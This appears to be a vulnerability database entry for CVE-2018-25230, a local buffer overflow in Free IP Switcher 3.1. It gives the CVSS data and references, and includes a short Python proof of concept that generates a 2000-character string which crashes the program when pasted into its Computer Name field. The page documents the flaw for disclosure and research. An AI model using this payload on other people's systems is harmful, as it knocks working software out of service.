CVE-2018-25230

Description

Free IP Switcher 3.1 contains a buffer overflow vulnerability that allows local attackers to crash the application by supplying an excessively long string in the Computer Name field. Attackers can paste a malicious payload into the Computer Name input field and click Activate to trigger a denial of service condition that crashes the application.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:eusing:free_ip_switcher:*:*:*:*:*:*:*:* - VULNERABLE

Free IP Switcher 3.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Proof of Concept for CVE-2018-25230
# Generates a payload to crash Free IP Switcher 3.1
# Usage: Copy the output, paste into "Computer Name" field, and click "Activate"

import sys

def generate_payload(length=2000):
    """
    Generate a long string to trigger the buffer overflow.
    """
    return "A" * length

if __name__ == "__main__":
    # Generate a payload of 2000 bytes
    payload = generate_payload(2000)
    print(f"Payload length: {len(payload)}")
    print("Payload (Copy this and paste into the 'Computer Name' field):")
    print(payload)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2018-25230
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2018-25230
[3] CVE Details https://www.cvedetails.com/cve/CVE-2018-25230/
[4] VulDB https://vuldb.com/cve/CVE-2018-25230
[5] http://www.eusing.com/index.html
[6] http://www.eusing.com/ipscan/free_ip_scanner.htm
[7] https://www.exploit-db.com/exploits/46382
[8] https://www.vulncheck.com/advisories/free-ip-switcher-denial-of-service-via-computer-name

Raw JSON Data

JSON

{"cve": {"id": "CVE-2018-25230", "sourceIdentifier": "[email protected]", "published": "2026-03-30T12:16:16.637", "lastModified": "2026-04-08T17:31:14.157", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Free IP Switcher 3.1 contains a buffer overflow vulnerability that allows local attackers to crash the application by supplying an excessively long string in the Computer Name field. Attackers can paste a malicious payload into the Computer Name input field and click Activate to trigger a denial of service condition that crashes the application."}, {"lang": "es", "value": "Free IP Switcher 3.1 contiene una vulnerabilidad de desbordamiento de búfer que permite a atacantes locales bloquear la aplicación al proporcionar una cadena excesivamente larga en el campo Computer Name. Los atacantes pueden pegar una carga útil maliciosa en el campo de entrada Computer Name y hacer clic en Activate para desencadenar una condición de denegación de servicio que bloquea la aplicación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:eusing:free_ip_switcher:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.1", "matchCriteriaId": "1EA53A3B-2C52-4D01-A611-3328415116AC"}]}]}], "references": [{"url": "http://www.eusing.com/index.html", "source": "[email protected]", "tags": ["Product"]}, {"url": "http://www.eusing.com/ipscan/free_ip_scanner.htm", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/46382", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/free-ip-switcher-denial-of-service-via-computer-name", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}